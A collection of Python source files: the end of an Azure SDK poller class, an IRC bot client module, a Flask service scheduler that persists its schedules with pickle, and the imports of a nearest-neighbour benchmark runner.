:type polling_method: ~azure.core.polling.PollingMethod
"""
def __init__(self, client, initial_response, deserialization_callback, polling_method):
# type: (Any, Any, Callable, PollingMethod[PollingReturnType]) -> None
self._callbacks = [] # type: List[Callable]
self._polling_method = polling_method
# This implicit test avoids bringing in an explicit dependency on Model directly
try:
deserialization_callback = deserialization_callback.deserialize # type: ignore
except AttributeError:
pass
# Might raise a CloudError
self._polling_method.initialize(client, initial_response, deserialization_callback)
# Prepare thread execution
self._thread = None
self._done = None
self._exception = None
if not self._polling_method.finished():
self._done = threading.Event()
self._thread = threading.Thread(
target=with_current_context(self._start),
name="LROPoller({})".format(uuid.uuid4()))
self._thread.daemon = True
self._thread.start()
def _start(self):
"""Start the long running operation.
On completion, runs any callbacks.
:param callable update_cmd: The API request to check the status of
the operation.
"""
try:
self._polling_method.run()
except Exception as err: #pylint: disable=broad-except
self._exception = err
finally:
self._done.set()
callbacks, self._callbacks = self._callbacks, []
while callbacks:
for call in callbacks:
call(self._polling_method)
callbacks, self._callbacks = self._callbacks, []
def polling_method(self):
# type: () -> PollingMethod[PollingReturnType]
"""Return the polling method associated to this poller.
"""
return self._polling_method
def continuation_token(self):
# type: () -> str
"""Return a continuation token that allows to restart the poller later.
:returns: An opaque continuation token
:rtype: str
"""
return self._polling_method.get_continuation_token()
@classmethod
def from_continuation_token(cls, polling_method, continuation_token, **kwargs):
# type: (PollingMethod[PollingReturnType], str, Any) -> LROPoller[PollingReturnType]
client, initial_response, deserialization_callback = polling_method.from_continuation_token(
continuation_token, **kwargs
)
return cls(client, initial_response, deserialization_callback, polling_method)
def status(self):
# type: () -> str
"""Returns the current status string.
:returns: The current status string
:rtype: str
"""
return self._polling_method.status()
def result(self, timeout=None):
# type: (Optional[int]) -> PollingReturnType
"""Return the result of the long running operation, or
the result available after the specified timeout.
:returns: The deserialized resource of the long running operation,
if one is available.
:raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
"""
self.wait(timeout)
return self._polling_method.resource()
@distributed_trace
def wait(self, timeout=None):
# type: (Optional[int]) -> None
"""Wait on the long running operation for a specified length
of time. You can check if this call as ended with timeout with the
"done()" method.
:param int timeout: Period of time to wait for the long running
operation to complete (in seconds).
:raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
"""
if self._thread is None:
return
self._thread.join(timeout=timeout)
try:
            # Let's handle a possible None forgivingly here
# https://github.com/python/mypy/issues/8165
raise self._exception # type: ignore
except TypeError: # Was None
pass
def done(self):
# type: () -> bool
"""Check status of the long running operation.
:returns: 'True' if the process has completed, else 'False'.
:rtype: bool
"""
return self._thread is None or not self._thread.is_alive()
def add_done_callback(self, func):
# type: (Callable) -> None
"""Add callback function to be run once the long running operation
has completed - regardless of the status of the operation.
:param callable func: Callback function that takes at least one
argument, a completed LongRunningOperation.
"""
# Still use "_done" and not "done", since CBs are executed inside the thread.
if self._done is None or self._done.is_set():
func(self._polling_method)
        # Still add it, for consistency (in case you wish to access it later)
self._callbacks.append(func)
def remove_done_callback(self, func):
# type: (Callable) -> None
"""Remove a callback from the long running operation.
:param callable func: The function to be removed from the callbacks.
:raises ValueError: if the long running operation has already completed.
"""
if self._done is None or self._done.is_set():
raise ValueError("Process is complete.")
self._callbacks = [c for c in self._callbacks if c != func]
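# A minimal usage sketch ('client', 'initial_response' and 'deserialize_fn'
# are illustrative placeholders):
#
#     poller = LROPoller(client, initial_response, deserialize_fn, NoPolling())
#     result = poller.result()  # waits if needed, then returns the resource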
|
irc.py
|
import logging
log = logging.getLogger(__name__)
import signal
import socket
import ssl
import threading
import botologist.util
import botologist.protocol
def get_client(config):
nick = config.get('nick', 'botologist')
def _make_server_obj(cfg):
if isinstance(cfg, dict):
return Server(**cfg)
elif isinstance(cfg, str):
return Server(cfg)
else:
raise ValueError(
'server config must be dict or str, {} given'.format(type(cfg))
)
if 'servers' in config:
assert isinstance(config['servers'], list)
servers = (_make_server_obj(s) for s in config['servers'])
else:
servers = (_make_server_obj(config['server']),)
server_pool = ServerPool(servers)
return Client(
server_pool,
nick=nick,
username=config.get('username', nick),
realname=config.get('realname', nick),
)
def _find_user(channel, host, nick):
if channel:
user = channel.find_user(identifier=host, name=nick)
if user:
return user
if host and nick:
return User(nick, host)
return None
class Client(botologist.protocol.Client):
MAX_MSG_CHARS = 500
PING_EVERY = 3 * 60 # seconds
PING_TIMEOUT = 20 # seconds
def __init__(self, server_pool, nick, username=None, realname=None):
super().__init__(nick)
self.server_pool = server_pool
self.server = None
self.username = username or nick
self.realname = realname or nick
self.irc_socket = None
self.quitting = False
self.reconnect_timer = False
self.ping_timer = None
self.ping_response_timer = None
self.connect_thread = None
def join_channels():
for channel in self.channels.values():
self.join_channel(channel)
self.on_connect.append(join_channels)
def run_forever(self):
log.info('Starting IRC client')
def sigterm_handler(signo, stack_frame): # pylint: disable=unused-argument
self.stop('Terminating, probably back soon!')
signal.signal(signal.SIGQUIT, sigterm_handler)
signal.signal(signal.SIGTERM, sigterm_handler)
signal.signal(signal.SIGINT, sigterm_handler)
try:
self.connect()
except (InterruptedError, SystemExit, KeyboardInterrupt):
self.stop('Terminating, probably back soon!')
except:
            self.stop('An error occurred!')
raise
def connect(self):
if self.irc_socket is not None:
self.disconnect()
        if self.connect_thread is not None and self.connect_thread.is_alive():
log.warning('connect_thread is already alive, not doing anything')
return
self.connect_thread = threading.Thread(
target=self._wrap_error_handler(self._connect)
)
self.connect_thread.start()
def disconnect(self):
        if self.connect_thread is None or not self.connect_thread.is_alive():
log.warning('connect_thread is not alive, not doing anything')
return
for callback in self.on_disconnect:
callback()
log.info('Disconnecting')
self.quitting = True
self.irc_socket.close()
self.irc_socket = None
def reconnect(self, time=None):
if self.irc_socket:
self.disconnect()
        if self.connect_thread is not None and self.connect_thread.is_alive():
log.warning('connect_thread is already alive, not doing anything')
return
if time:
log.info('Reconnecting in %d seconds', time)
self.connect_thread = self.reconnect_timer = threading.Timer(
time,
self._wrap_error_handler(self._connect),
)
else:
self.connect_thread = threading.Thread(
target=self._wrap_error_handler(self._connect),
)
self.connect_thread.start()
def _connect(self):
self.quitting = False
if self.reconnect_timer:
self.reconnect_timer = None
self.server = self.server_pool.get()
log.info('Connecting to %s:%s', self.server.host, self.server.port)
self.irc_socket = IRCSocket(self.server)
self.irc_socket.connect()
log.info('Successfully connected to server!')
self.send('NICK ' + self.nick)
self.send('USER ' + self.username + ' 0 * :' + self.realname)
self.loop()
def loop(self):
while self.irc_socket:
try:
data = self.irc_socket.recv()
except OSError:
if self.quitting:
log.info('socket.recv threw an OSError, but quitting, '
'so exiting loop', exc_info=True)
else:
log.exception('socket.recv threw an exception')
self.reconnect(5)
return
if data == b'':
if self.quitting:
log.info('received empty binary data, but quitting, so exiting loop')
return
else:
raise IRCSocketError('Received empty binary data')
for msg in botologist.util.decode_lines(data):
if not msg:
continue
log.debug('[recv] %r', msg)
if self.quitting and msg.startswith('ERROR :'):
log.info('received an IRC ERROR, but quitting, so exiting loop')
return
self.handle_msg(msg)
def join_channel(self, channel):
assert isinstance(channel, Channel)
log.info('Joining channel: %s', channel.name)
self.channels[channel.name] = channel
self.send('JOIN ' + channel.name)
def handle_msg(self, msg):
words = msg.split()
if words[0] == 'PING':
self.reset_ping_timer()
self.send('PONG ' + words[1])
elif words[0] == 'ERROR':
if ':Your host is trying to (re)connect too fast -- throttled' in msg:
log.warning('Throttled for (re)connecting too fast')
self.reconnect(60)
else:
log.warning('Received error: %s', msg)
self.reconnect(10)
elif '600' > words[0] > '400':
log.warning('Received error reply: %s', msg)
elif len(words) > 1:
try:
nick, host, _ = User.split_ircformat(words[0])
except:
nick = host = None
# welcome message, lets us know that we're connected
if words[1] == '001':
for callback in self.on_connect:
callback()
elif words[1] == 'PONG':
self.reset_ping_timer()
elif words[1] == 'JOIN':
channel = words[2]
user = User.from_ircformat(words[0])
log.debug('User %s (%s @ %s) joined channel %s',
user.nick, user.ident, user.host, channel)
if user.nick == self.nick:
self.send('WHO '+channel)
else:
self.channels[words[2]].add_user(user)
for callback in self.on_join:
callback(self.channels[words[2]], user)
# response to WHO command
elif words[1] == '352':
channel = self.channels[words[3]]
host = words[5]
nick = words[7]
if not channel.find_user(identifier=host, name=nick):
ident = words[4]
user = User(nick, host, ident)
channel.add_user(user)
elif words[1] == 'NICK':
new_nick = words[2][1:]
log.debug('User %s changing nick: %s', host, new_nick)
for channel in self.channels.values():
channel_user = channel.find_user(identifier=host)
if channel_user:
log.debug('Updating nick for user %r in channel %s',
channel_user, channel.name)
channel_user.name = new_nick
elif words[1] == 'PART':
channel = self.channels[words[2]]
log.debug('User %s parted from channel %s', host, channel)
channel.remove_user(name=nick, identifier=host)
elif words[1] == 'KICK':
channel = self.channels[words[2]]
user = _find_user(channel, host, nick)
kicked_nick = words[3]
kicked_user = _find_user(channel, None, kicked_nick)
log.debug('User %s was kicked by %s from channel %s',
                          kicked_nick, user.nick, channel.name)
channel.remove_user(name=kicked_nick)
for callback in self.on_kick:
callback(channel, kicked_user, user)
if kicked_nick == self.nick:
self.join_channel(channel)
elif words[1] == 'QUIT':
log.debug('User %s!%s quit', nick, host)
for channel in self.channels.values():
channel.remove_user(name=nick, identifier=host)
elif words[1] == 'PRIVMSG':
channel = self.channels.get(words[2])
user = _find_user(channel, host, nick)
message = Message.from_privmsg(msg, user)
message.channel = channel
                if not message.is_private:
                    message.channel = self.channels[message.target]
                    if not user:
                        # The sender wasn't found in the channel's user list;
                        # fall back to the User parsed from the message itself
                        # (the original logged user.nick on a None user)
                        user = message.user
                        log.debug('Unknown user %s (%s) added to channel %s',
                                  user.nick, user.host, message.target)
                        self.channels[message.target].add_user(user)
for callback in self.on_privmsg:
callback(message)
def send_msg(self, target, message):
if message is None:
return
if target in self.channels:
if not self.channels[target].allow_colors:
message = botologist.util.strip_irc_formatting(message)
if isinstance(message, str):
message = message.split('\n')
for privmsg in message:
self.send('PRIVMSG ' + target + ' :' + privmsg)
def send(self, msg):
if len(msg) > self.MAX_MSG_CHARS:
log.warning('Message too long (%d characters), upper limit %d',
len(msg), self.MAX_MSG_CHARS)
msg = msg[:(self.MAX_MSG_CHARS - 3)] + '...'
log.debug('[send] %s', repr(msg))
self.irc_socket.send(msg + '\r\n')
def stop(self, reason='Leaving'):
for callback in self.on_disconnect:
callback()
if self.reconnect_timer:
log.info('Aborting reconnect timer')
self.reconnect_timer.cancel()
self.reconnect_timer = None
return
if self.ping_timer:
self.ping_timer.cancel()
self.ping_timer = None
if self.ping_response_timer:
self.ping_response_timer.cancel()
self.ping_response_timer = None
if not self.irc_socket:
log.warning('Tried to quit, but irc_socket is None')
return
log.info('Quitting, reason: %s', reason)
self.quitting = True
self.send('QUIT :' + reason)
def reset_ping_timer(self):
if self.ping_response_timer:
self.ping_response_timer.cancel()
self.ping_response_timer = None
if self.ping_timer:
self.ping_timer.cancel()
self.ping_timer = None
self.ping_timer = threading.Timer(
self.PING_EVERY,
self._wrap_error_handler(self.send_ping),
)
self.ping_timer.start()
def send_ping(self):
if self.ping_response_timer:
log.warning('Already waiting for PONG, cannot send another PING')
return
self.send('PING ' + self.server.host)
self.ping_response_timer = threading.Timer(
self.PING_TIMEOUT,
self._wrap_error_handler(self.handle_ping_timeout),
)
self.ping_response_timer.start()
def handle_ping_timeout(self):
log.warning('Ping timeout')
self.ping_response_timer = None
self.reconnect()
class User(botologist.protocol.User):
def __init__(self, nick, host=None, ident=None):
if host and '@' in host:
ident, host = host.split('@')
self.host = host
if ident and ident[0] == '~':
ident = ident[1:]
self.ident = ident
super().__init__(nick, host)
@staticmethod
def split_ircformat(string):
if string[0] == ':':
string = string[1:]
parts = string.split('!')
nick = parts[0]
ident, host = parts[1].split('@')
return (nick, host, ident)
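    # For example: split_ircformat(':alice!~alice@example.com') returns
    # ('alice', 'example.com', '~alice'); the leading '~' on the ident is
    # stripped later, in __init__.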
@classmethod
def from_ircformat(cls, string):
nick, host, ident = cls.split_ircformat(string)
return cls(nick, host, ident)
def __repr__(self):
return '<botologist.protocol.irc.User "{}!{}@{}" at {}>'.format(
self.name, self.ident, self.host, hex(id(self)))
class Message(botologist.protocol.Message):
def __init__(self, user, target, message):
if not isinstance(user, User):
user = User.from_ircformat(user)
super().__init__(message, user, target)
self.is_private = self.target[0] != '#'
@classmethod
def from_privmsg(cls, msg, user=None):
words = msg.split()
return cls(user or words[0][1:], words[2], ' '.join(words[3:])[1:])
class Server:
def __init__(self, address, ssl=False):
parts = address.split(':')
self.host = parts[0]
if len(parts) > 1:
self.port = int(parts[1])
else:
self.port = 6667
self.ssl = ssl
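# For example: Server('irc.example.com:6697', ssl=True) connects to port
# 6697 with TLS, while Server('irc.example.com') defaults to port 6667.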
class ServerPool:
def __init__(self, servers=None):
self.index = 0
self.servers = []
if servers:
for server in servers:
self.add_server(server)
def add_server(self, server):
assert isinstance(server, Server)
self.servers.append(server)
def get(self):
server = self.servers[self.index]
self.index += 1
if self.index >= len(self.servers):
self.index = 0
return server
class Channel(botologist.protocol.Channel):
def __init__(self, name):
if name[0] != '#':
name = '#' + name
super().__init__(name)
self.allow_colors = True
def find_nick_from_host(self, host):
if '@' in host:
host = host[host.index('@')+1:]
user = self.find_user(identifier=host)
if user:
return user.name
def find_host_from_nick(self, nick):
user = self.find_user(name=nick)
if user:
return user.host
def remove_user(self, user=None, name=None, identifier=None):
if not user and identifier and '@' in identifier:
identifier = identifier[identifier.index('@')+1:]
return super().remove_user(user=user, name=name, identifier=identifier)
class IRCSocketError(OSError):
pass
class IRCSocket:
def __init__(self, server):
self.server = server
self.socket = None
self.ssl_context = None
if self.server.ssl:
# https://docs.python.org/3/library/ssl.html#protocol-versions
self.ssl_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
self.ssl_context.options |= ssl.OP_NO_SSLv2 # pylint: disable=no-member
self.ssl_context.options |= ssl.OP_NO_SSLv3 # pylint: disable=no-member
self.ssl_context.verify_mode = ssl.CERT_REQUIRED
self.ssl_context.check_hostname = True
self.ssl_context.load_default_certs()
def connect(self):
log.debug('Looking up address info for %s:%s',
self.server.host, self.server.port)
addrinfo = socket.getaddrinfo(
self.server.host, self.server.port,
socket.AF_UNSPEC, socket.SOCK_STREAM
)
for res in addrinfo:
af, socktype, proto, canonname, address = res
try:
self.socket = socket.socket(af, socktype, proto)
except OSError:
log.warning('uncaught exception while initialising socket', exc_info=True)
self.socket = None
continue
if self.server.ssl:
log.debug('server is using SSL')
self.socket = self.ssl_context.wrap_socket(
self.socket, server_hostname=self.server.host)
try:
self.socket.settimeout(10)
log.debug('Trying to connect to %s:%s', address[0], address[1])
self.socket.connect(address)
except OSError:
log.warning('uncaught exception while connecting to socket', exc_info=True)
self.close()
continue
# if we reach this point, the socket has been successfully created,
# so break out of the loop
break
if self.socket is None:
raise IRCSocketError('Could not open socket')
self.socket.settimeout(None)
def recv(self, bufsize=4096):
data = self.socket.recv(bufsize)
# Keep reading until the buffer ends with CRLF, so callers always get
# complete IRC lines (13 = \r, 10 = \n).
while data != b'' and not data.endswith(b'\r\n'):
data += self.socket.recv(bufsize)
return data
def send(self, data):
if isinstance(data, str):
data = data.encode('utf-8')
self.socket.send(data)
def close(self):
try:
self.socket.shutdown(socket.SHUT_RDWR)
except OSError:
# shutdown will fail if the socket has already been closed by the
# server, which will happen if we get throttled for example
pass
self.socket.close()
self.socket = None
|
scheduler.py
|
import schedule
import time
import threading
from random import randrange
import json
from flask import Flask,request,jsonify
import random
import json
import requests
import argparse
from datetime import datetime
import pickle
app = Flask(__name__)
service_life_cycle_ip = "127.0.0.1"
service_life_cycle_port = 8080
Myport = 5053
DUMPING_DELAY_IN_3_SECS = 1
def time_add(time,minutes_to_add) :
hr = int(str(time).split(":")[0])
mn = int(str(time).split(":")[1])
mn = (mn+minutes_to_add)
hr = (hr + int(mn/60))%24
mn=mn%60
hr = str(hr)
mn = str(mn)
if(len(hr)==1):
hr="0"+hr
if(len(mn)==1):
mn="0"+mn
return hr+":"+mn
class Scheduler:
def __init__(self):
self.job_dict = {}  # schedule job handles, keyed by service instance id
self.main_service_id_dict = {}  # instance id -> "username_application_service"
self.single_instances = {}  # single-instance scheduling requests, keyed by instance id
self.started = {}  # currently running services, keyed by instance id
self.loop_schedules = []  # recurring schedules, kept for re-registration on restart
self.main_id_sch_id = {}  # "username_application_service" -> instance id
def pending_jobs(self):
while True:
schedule.run_pending()
time.sleep(10)
def send_request_to_service_life_cycle(self,username,application_id,service_name,service_instance_id,type_):
response = {"username":username,"applicationname":application_id,"servicename":service_name,"serviceId":self.main_service_id_dict[service_instance_id]}
print(response)
if type_=="start":
res = requests.post('http://'+service_life_cycle_ip+':'+str(service_life_cycle_port)+'/servicelcm/service/start', json=response)
else:
res = requests.post('http://'+service_life_cycle_ip+':'+str(service_life_cycle_port)+'/servicelcm/service/stop', json=response)
def run(self):
t1 = threading.Thread(target=self.pending_jobs)
t1.start()
def exit_service(self,service_instance_id):
service_instance_id,username,application_id,service_name = service_instance_id[0],service_instance_id[1],service_instance_id[2],service_instance_id[3]
print("+MSG TO SLCM TO STOP \t\t",service_instance_id)
#send request to service life cycle manager to cancel service
self.send_request_to_service_life_cycle(username,application_id,service_name,service_instance_id,"stop")
del self.started[service_instance_id]
schedule.cancel_job(self.job_dict[service_instance_id])
# del self.job_dict[service_instance_id]
def run_service(self,service_detail):
username,application_id,service_name,end,service_instance_id = service_detail[0],service_detail[1],service_detail[2],service_detail[3],service_detail[4]
print("+MSG TO SLCM TO START \t\t",service_instance_id)
#send request to service life cycle manager to start service
self.send_request_to_service_life_cycle(username,application_id,service_name,service_instance_id,"start")
data = {
"service_id": service_instance_id,
"username":username,
"application_id":application_id,
"service_name":service_name,
"end":end
}
self.started[service_instance_id]=data
job_id = schedule.every().day.at(end).do(self.exit_service,((service_instance_id,username,application_id,service_name)))
self.job_dict[service_instance_id]=job_id
def run_service_period(self,service_detail):
username,application_id,service_name,end,service_instance_id = service_detail[0],service_detail[1],service_detail[2],service_detail[3],service_detail[4]
print("+MSG TO SLCM TO START \t\t",service_instance_id)
#send request to service life cycle manager to start service
self.send_request_to_service_life_cycle(username,application_id,service_name,service_instance_id,"start")
now = datetime.now()
current_time = now.strftime("%H:%M")
end_time = time_add(current_time,int(end))
data = {
"service_id": service_instance_id,
"username":username,
"application_id":application_id,
"service_name":service_name,
"end":end_time
}
self.started[service_instance_id]=data
job_id = schedule.every().day.at(end_time).do(self.exit_service,((service_instance_id,username,application_id,service_name)))
self.job_dict[service_instance_id]=job_id
def run_service_once(self,service_detail):
username,application_id,service_name,end,service_instance_id = service_detail[0],service_detail[1],service_detail[2],service_detail[3],service_detail[4]
print("+MSG TO SLCM TO START \t\t",service_instance_id)
#send request to service life cycle manager to start service
self.send_request_to_service_life_cycle(username,application_id,service_name,service_instance_id,"start")
data = {
"service_id": service_instance_id,
"username":username,
"application_id":application_id,
"service_name":service_name,
"end":end
}
self.started[service_instance_id]=data
if(service_instance_id in self.single_instances.keys()):
del self.single_instances[service_instance_id]
job_id = schedule.every().day.at(end).do(self.exit_service,((service_instance_id,username,application_id,service_name)))
# Cancel any previously scheduled exit job for this instance before
# registering the new one.
previous_job = self.job_dict.get(service_instance_id)
if previous_job:
schedule.cancel_job(previous_job)
self.job_dict[service_instance_id]=job_id
def stop_all_started_at_their_end_time(self):
for key in self.started.keys():
service_instance_id,username,application_id,service_name,end = self.started[key]["service_id"],self.started[key]["username"],self.started[key]["application_id"],self.started[key]["service_name"],self.started[key]["end"]
job_id = schedule.every().day.at(end).do(self.exit_service,((service_instance_id,username,application_id,service_name)))
self.job_dict[service_instance_id]=job_id
# del self.started[service_instance_id]
self.main_service_id_dict[service_instance_id] = username+"_"+application_id+"_"+service_name
self.main_id_sch_id[username+"_"+application_id+"_"+service_name]=service_instance_id
def schedule(self,request_,s_id=None):
username = request_["username"]
application_id = request_["application_id"]
service_name = request_["service_name"]
single_instance = request_["singleinstance"]
day = request_["day"]
start_time = request_["start_time"]
end = request_["end_time"]
period = request_["period"]
# service_instance_id=username+"_"+application_id+"_"+service_name+"_"+str(randrange(10000))
main_service_id = username+"_"+application_id+"_"+service_name
service_instance_id = s_id
if service_instance_id is None:
service_instance_id=username+"_"+application_id+"_"+service_name+"_"+str(randrange(10000))
self.main_service_id_dict[service_instance_id]=main_service_id
self.main_id_sch_id[main_service_id] = service_instance_id
result = "OK"
if(str(single_instance)=="True"):
print("single instance ",bool(single_instance))
if(start_time=="NOW" and day is None):
self.run_service_once((username,application_id,service_name,end,service_instance_id))
elif day is not None and start_time!="NOW":
self.single_instances[service_instance_id]=request_
# Dispatch on the configured weekday; any unrecognised value falls
# back to Sunday.
weekdays = ("monday", "tuesday", "wednesday", "thursday", "friday", "saturday")
day_attr = day if day in weekdays else "sunday"
job_id = getattr(schedule.every(), day_attr).at(start_time).do(
self.run_service_once, (username, application_id, service_name, end, service_instance_id))
self.job_dict[service_instance_id]=job_id
else:
self.single_instances[service_instance_id]=request_
job_id = schedule.every().day.at(start_time).do( self.run_service_once,((username,application_id,service_name,end,service_instance_id)))
self.job_dict[service_instance_id]=job_id
elif day is None and period is not None:
self.loop_schedules.append({"service_id":service_instance_id,"request": request_})
interval = period["interval"]
end = period["length"]
job_id = schedule.every(interval).minutes.do( self.run_service_period,((username,application_id,service_name,end,service_instance_id)))
self.job_dict[service_instance_id]=job_id
elif day is not None:
self.loop_schedules.append({"service_id":service_instance_id,"request": request_})
if(day=="monday"):
job_id = schedule.every().monday.at(start_time).do( self.run_service,((username,application_id,service_name,end,service_instance_id)))
elif(day=="tuesday"):
job_id = schedule.every().tuesday.at(start_time).do( self.run_service,((username,application_id,service_name,end,service_instance_id)))
elif(day=="wednesday"):
job_id = schedule.every().wednesday.at(start_time).do( self.run_service,((username,application_id,service_name,end,service_instance_id)))
elif(day=="thursday"):
job_id = schedule.every().thursday.at(start_time).do( self.run_service,((username,application_id,service_name,end,service_instance_id)))
elif(day=="friday"):
job_id = schedule.every().friday.at(start_time).do( self.run_service,((username,application_id,service_name,end,service_instance_id)))
elif(day=="saturday"):
job_id = schedule.every().saturday.at(start_time).do( self.run_service,((username,application_id,service_name,end,service_instance_id)))
else:
job_id = schedule.every().sunday.at(start_time).do( self.run_service,((username,application_id,service_name,end,service_instance_id)))
else:
result = "ERROR : wrong scheduling format"
return result,service_instance_id
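# A sketch of the request dict that schedule() expects (all values here are
# hypothetical; "period", when used, is a dict like
# {"interval": <minutes>, "length": <minutes>}):
#
#     request_ = {
#         "username": "alice",
#         "application_id": "app-1",
#         "service_name": "svc-1",
#         "singleinstance": "True",   # compared as a string above
#         "day": "monday",            # or None
#         "start_time": "10:00",      # or "NOW"
#         "end_time": "10:30",
#         "period": None,
#     }
#     result, service_id = sch.schedule(request_)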
def GetDict(services):
d={}
for _ in services:
d[_]=False
return d
def ConstructDict(data):
forward_dict={}
backward_dict={}
for _ in data.keys():
forward_dict[_]=data[_]["servicename"]
for key,values in forward_dict.items():
backward_dict[values]=key
return forward_dict,backward_dict
def Make_Data(username,application_id,service_name,start_time=None,end_time=None,singleinstance=False,day=None,period=None):
data_dict={"username":username,"application_id":application_id,"service_name":service_name,"singleinstance":singleinstance,"day":day,"start_time":start_time,"end_time":end_time,"period":period}
return data_dict
def GetServices(data,all_services):
services=[]
for _ in all_services:
if(data[_]["scheduled"]=="True"):
services.append(_)
return services
def Convert(data):
return_data=[]
username=data["Application"]["username"]
application_id=data["Application"]["applicationname"]
all_services=list(data["Application"]["services"].keys())
services=GetServices(data["Application"]["services"],all_services)
forward_dict,backward_dict=ConstructDict(data["Application"]["services"])
# print(forward_dict)
# print(backward_dict)
# print(services)
for service in services:
# if(service!="service-1"):
# continue
bool_dict=GetDict(all_services)
bool_dict[service]=True
order_dependency=[]
stack=[]
stack.append(service)
while(len(stack) > 0):
# print(order_dependency)
temp=stack.pop()
if(temp!=service):
order_dependency.append(temp)
curr_dep=data["Application"]["services"][temp]["dependency"]
for _ in curr_dep:
if(not bool_dict[backward_dict[_]]):
stack.append(backward_dict[_])
bool_dict[backward_dict[_]]=True
order_dependency=order_dependency[::-1]
order_dependency.append(service)
# print(order_dependency)
if(data["Application"]["services"][service]["period"]!="None"):
for service_dep in order_dependency:
return_data.append(Make_Data(username=username,application_id=application_id,service_name=forward_dict[service_dep],singleinstance="False",period=data["Application"]["services"][service]["period"]))
else:
times=[]
days=[]
flags=[True,True]
if "time" in data["Application"]["services"][service].keys():
times=[(s,e) for s,e in zip(data["Application"]["services"][service]["time"]["start"],data["Application"]["services"][service]["time"]["end"])]
else:
times.append((None,None))
flags[0]=False
if "days" in data["Application"]["services"][service].keys():
days=[_ for _ in data["Application"]["services"][service]["days"]]
else:
days.append(None)
flags[1]=False
if(data["Application"]["services"][service]["singleinstance"]) or flags[1]:
for service_dep in order_dependency:
for day in days:
for time in times:
return_data.append(Make_Data(username=username,application_id=application_id,service_name=forward_dict[service_dep],singleinstance=data["Application"]["services"][service]["singleinstance"],start_time=time[0],end_time=time[1],day=day))
else:
for service_dep in order_dependency:
for time in times:
return_data.append(Make_Data(username=username,application_id=application_id,service_name=forward_dict[service_dep],singleinstance=data["Application"]["services"][service]["singleinstance"],start_time=time[0],end_time=time[1]))
return return_data
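# A sketch of the "Application" config that Convert() walks, inferred from the
# lookups above (all values hypothetical). Each service entry carries its
# display name, a dependency list of other services' display names, and its
# scheduling fields:
#
#     data = {"Application": {
#         "username": "alice",
#         "applicationname": "app-1",
#         "services": {
#             "service-1": {"servicename": "svc-1", "dependency": [],
#                           "scheduled": "True", "singleinstance": "False",
#                           "period": "None",
#                           "time": {"start": ["10:00"], "end": ["10:30"]},
#                           "days": ["monday"]},
#             "service-2": {"servicename": "svc-2", "dependency": ["svc-1"],
#                           "scheduled": "False", "singleinstance": "False",
#                           "period": "None"},
#         },
#     }}
#     scheduling_requests = Convert(data)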
def ChangeData(data,name):
for _ in data["Application"]["services"].keys():
if(_ != name):
data["Application"]["services"][_]["scheduled"]="False"
else:
data["Application"]["services"][_]["scheduled"]="True"
del data["Application"]["services"][_]["days"]
data["Application"]["services"][_]["time"]["start"]=["NOW"]
data["Application"]["services"][_]["time"]["end"]=["23:45"]
return data
@app.route('/schedule_service', methods=['GET', 'POST'])
def schedule_service():
content = request.get_json()
res = "OK"
print(content)
print(type(content))
if(content["action"]=="Stop"):
id_ = content["config"]["Application"]["username"]+"_"+content["config"]["Application"]["applicationname"]+"_"+content["config"]["Application"]["services"][content["servicename"]]["servicename"]
response = {"username":content["config"]["Application"]["username"],"applicationname":content["config"]["Application"]["applicationname"],"servicename":content["config"]["Application"]["services"][content["servicename"]]["servicename"],"serviceId":id_}
print(response)
print(type(response))
service_instance_id = sch.main_id_sch_id[id_]
del sch.started[service_instance_id]
schedule.cancel_job(sch.job_dict[service_instance_id])
res = requests.post('http://'+service_life_cycle_ip+':'+str(service_life_cycle_port)+'/servicelcm/service/stop', json=response)
print("+MSG TO SLCM TO STOP ",id_)
else:
if(content["action"]=="Start"):
print("start")
content["config"]=ChangeData(content["config"],content["servicename"])
# print(content["config"])
extracted_requests = Convert(content["config"])
# print(extracted_requests)
for scheduling_request in extracted_requests:
print("+ RECEIVED REQUEST")
print("\t\t ",scheduling_request,"\n")
result,service_id = sch.schedule(scheduling_request)
if(result!="OK"):
res="ERROR : wrong scheduling format"
return {"result":res}
sch = None
def dumping_thread():
global sch
ticks = 0  # one tick per 3-second sleep, so elapsed minutes = ticks / 20
while True:
time.sleep(3)
ticks += 1
if ticks % DUMPING_DELAY_IN_3_SECS == 0:
print("+ Started ", ticks / 20, " minutes ago")
print("+ DUMPING DETAILS")
print("\t- Single Instance Schedules")
print("\n\t\t",sch.single_instances)
print("\t- Started")
print("\n\t\t",sch.started)
print("\t- Schedules")
print("\n\t\t",sch.loop_schedules)
print("\n")
print("+ DUMPING DETAILS END")
data = {"single_instance":sch.single_instances,
"started":sch.started,
"schedules":sch.loop_schedules
# "main_service_id_dict":self.main_service_id_dict
}
with open("/home/sch_data.pickle", "wb") as pickle_out:
pickle.dump(data, pickle_out)
if __name__ == "__main__":
# ap = argparse.ArgumentParser()
# ap.add_argument("-p","--port",required=True)
# ap.add_argument("-i","--service_life_cycle_ip",required=True)
# ap.add_argument("-x","--service_life_cycle_port",required=True)
# args = vars(ap.parse_args())
# service_life_cycle_ip = args["service_life_cycle_ip"]
# service_life_cycle_port = int(args["service_life_cycle_port"])
# Myport = args["port"]
sch = Scheduler()
sch.run()
'''
retrieve data from logging service
sch.started = data["started"] #dictionary
sch.loop_schedules = data["schedules"] #list
sch.single_instances = data["single_instance"] #dictionary
sch.main_service_id_dict = data["main_service_id_dict"] #dictionary
sch.stop_all_started_at_their_end_time()
for key in sch.single_instances.keys():
sch.schedule(sch.single_instances[key])
for request in sch.loop_schedules:
sch.schedule(request)
#it covers both single instance and non single instances
'''
try:
with open("/home/sch_data.pickle", "rb") as dbfile:
db = pickle.load(dbfile)
schedules_ = db["schedules"]
started = db["started"]
single_instances = db["single_instance"]
sch.loop_schedules = schedules_
sch.single_instances = single_instances
sch.started = started
for schedule_entry in schedules_:
service_instance_id = schedule_entry["service_id"]
request_ = schedule_entry["request"]
sch.schedule(request_, service_instance_id)
for key in single_instances.keys():
sch.schedule(single_instances[key], key)
sch.stop_all_started_at_their_end_time()
except Exception:
print("NO PREVIOUS DATA")
t2 = threading.Thread(target=dumping_thread)
t2.start()
app.run(debug=False,host="0.0.0.0",port=int(Myport))
|
runner.py
|
import argparse
import datetime
import colors
import docker
import json
import multiprocessing
import numpy
import os
import psutil
import requests
import sys
import threading
import time
import traceback
from ann_benchmarks.datasets import get_dataset, DATASETS
from ann_benchmarks.algorithms.definitions import (Definition,
instantiate_algorithm,
get_algorithm_name)
from ann_benchmarks.distance import metrics, dataset_transform
